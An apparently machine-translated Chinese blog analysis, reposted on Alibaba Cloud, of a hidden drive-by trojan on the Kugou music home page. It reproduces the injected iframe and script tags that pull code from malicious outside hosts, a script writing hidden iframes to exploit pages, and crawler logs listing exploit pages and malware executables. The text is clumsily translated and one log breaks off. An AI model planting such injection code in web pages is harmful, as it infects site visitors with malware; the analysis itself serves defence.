Detailed analysis of hidden trojans on the home page of codoy music + 72 horses

Last Update:2013-11-29 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Author: yimike
Source: jianmeng

Recently, some friends reported that the home page of codoy music was infected with Trojans. The strange thing is that only when the page is accessed for the first time, the trojan will be reported when the software is killed. Otherwise, no matter how hard it is refreshed, no webpage Trojans will be reported. Following this clue, I opened the home page of codoy music (h ** p: // www.kugou.com/home) and finally found an extremely hidden Trojan.

The detailed process is as follows:

1. h ** p: // www.kugou.com/homethe Page code seems to be normal, but there is an iframe, the code is as follows:

<IFRAME marginWidth = 0 marginHeight = 0 src?cairing.htm "frameBorder = 0 width = 230 scrolling = no height = 327> </IFRAME>

Here, cairing.htm points to h ** p: // www.kugou.com/home/cairing.htm

2. When each independent IP address accesses the h ** p: // www.kugou.com/home/cairing.htmpage for the first time, the source code contains the following code:

<IFRAME id = cif123 src = "h ** p: // count12.5lyes.net/sa.aspx? S1 = 0 & s2 = 1214155605 & s3 = 82585631941791 & s4 = 1001282043 & s5 = 621d5 & n = 0.5986579168677271 "width = 0 height = 0> </IFRAME>
<SCRIPT language = javascript id = clickjs src = "h ** p: // service.o00o.cn: 8082/click. aspx? Sid = ad_3001 "> </SCRIPT>

When you access this page again with the same IP address, there will be no such code. That is to say, the Trojan horse on the Youku music homepage may be related to this.

3. An IP address first accesses h ** p: // service.o00o.cn: 8082/click. aspx? When sid = ad_3001 is displayed, it reads local coockies, checks whether it has logged on to codoy, and obtains the codoy ID.
Based on this information, an iframe is generated and written. This IFRAME is the line of 51yes code in step 1.
Then access the iframe of the row.

4. When you access the src address in the iframe, you receive a strange irrelevant link:
H ** p: // returns
View the data packet as follows:

Pay attention to the highlighted yellow part, that is, the link referenced from 51yes.net in the unrelated connection above, that is, the iframe address in the second part.
In general, when accessing the iframe pointing to 51yes.net in part 2nd, the server of 51yes.net returns this "irrelevant" link.

5. Catch up with the "irrelevant" link and get the code:

<Script type = "text/javascript">
// Window. setTimeout ('Goo (); ', 1x60x1000 );
Goo ();
Function goo ()
{
Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // OK .dessp.com/mmmgo.htm"> </iframe> ');
Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // ie.ietop.com/ms.htm"> </iframe> ');
Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // arp.aafrp.com/mmmmgo.htm"> </iframe> ');
Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // mm1.yaoch.com/mmgo.htm"> </iframe> ');
// Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // representation> </iframe> ');
// Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // representation> </iframe> ');
// Document. write ('<iframe width = 100 height = 100 border = 0 src = "h ** p: // representation> </iframe> ');
Document. write ('<script src = "h ** p: // service.o00o.cn: 8081/click. aspx? Id = test_2 "> </script> ');
} </Script>
<Script src = 'H ** p: // s35.cnzz.com/stat.php? Id = 817650 & web_id = 817650 'language = 'javascript' charset = 'gb2312'> </script>

At this time, the reason for Trojan Horse mounting on the Youku music homepage is clear. This trojan is caused by two points:

1. h ** p: // www.kugou.com/home/cairing.htm implanted with malicious code: <SCRIPT language = javascript id = clickjs src = "h ** p: // service.o00o.cn: 8082/click. aspx? Sid = ad_3001 "> </SCRIPT>
2. The sa. aspx code of the counting site 5lyes.net may beHackerThe intrusion was maliciously modified, or the machine room was infected with the arp virus, causing sa. aspx to be infected with malicious code (the latter is unlikely)

PS. The above links can be accessed only by combining local coockies

The following is an analysis of the Trojan:>

Log is generated by FreShow
[Wide] http:// OK .dessp.com/mmmgo.htm
[Frame] http://www.jsp369.cn/a1.htm
[Frame] http://www.regedit369.cn/index.htm
[Frame] http://www.regedit369.cn/Ms06014.htm
[Object] http://d.yuku369.cn/max.exe
[Frame] http://www.regedit369.cn/cuteqq.htm
[Frame] http://www.regedit369.cn/Ajax.htm
[Object] http://d.yuku369.cn/max.exe
[Frame] http://www.regedit369.cn/Ms06014.htm
[Object] http://up.2cto.com/Article/200806/20080624014438403.gif
[Object] http://up.2cto.com/Article/200806/20080624014438181.gif
[Object] http://d.yuku369.cn/max.exe
[Frame] http://www.regedit369.cn/Bfyy.htm
[Object] http://d.yuku369.cn/max.exe
[Frame] http://www.regedit369.cn/Lz.htm
[Object] http://d.yuku369.cn/max.exe
[Frame] http://www.regedit369.cn/flash.htm
[Frame] http://www.regedit369.cn/ilink.html
[Object] http://www.regedit369.cn/i115.swf
[Object] http://www.regedit369.cn/i64.swf
[Object] http://www.regedit369.cn/i47.swf
[Object] http://www.regedit369.cn/i45.swf
[Object] http://www.regedit369.cn/i28.swf
[Object] http://www.regedit369.cn/i16.swf
[Frame] http://www.regedit369.cn/flink.html
[Object] http://www.regedit369.cn/i115.swf
[Object] http://www.regedit369.cn/i64.swf
[Object] http://www.regedit369.cn/i47.swf
[Object] http://www.regedit369.cn/i45.swf
[Object] http://www.regedit369.cn/i28.swf
[Object] http://www.regedit369.cn/i16.swf
[Frame] http://www.regedit369.cn/uuc.htm
[Frame] http://www.regedit369.cn/UU.ini
[Object] http://d.yuku369.cn/UUSee.CAB

Log is generated by FreShow.
[Wide] http://ie.ietop.com/ms.htm
[Frame] http://www.worka.net.cn/a1.html
[Frame] http://www.worka.net.cn/add.html
[Frame] http://www.flashl.net.cn/lg.html
[Frame] http://www.flashp.net.cn/1.html
[Object] http://www.sarvt.cn/google.exe
[Frame] http://www.flashp.net.cn/l.html
[Object] http://www.sarvt.cn/google.exe
[Frame] http://www.flashp.net.cn/bf.html
[Frame] http://www.flashp.net.cn/UUUpgrade.ini
[Object] http://www.flashp.net.cn/UUSee.CAB
[Frame] http://www.flashp.net.cn/r.html
[Object] http://www.sarvt.cn/google.exe
[Frame] http://www.flashp.net.cn/nr.html
[Object] http://www.sarvt.cn/google.exe
[Object] http://www.tygvb.cn/4562.swf
[Object] http://www.tygvb.cn/4561.swf

Log is generated by FreShow.
[Wide] http://arp.aafrp.com/mmmmgo.htm
[Frame] http://cv.vkhys.org.cn/vkhys/aa1.htm
[Frame] http://cv.vkhys.org.cn/f.htm
[Frame] http://cv.vkhys.org.cn/ilink.html
[Object] http://cv.vkhys.org.cn/i115.swf
[Object] http://cv.vkhys.org.cn/i64.swf
[Object] http://cv.vkhy

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Detailed analysis of hidden trojans on the home page of codoy music + 72 horses

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support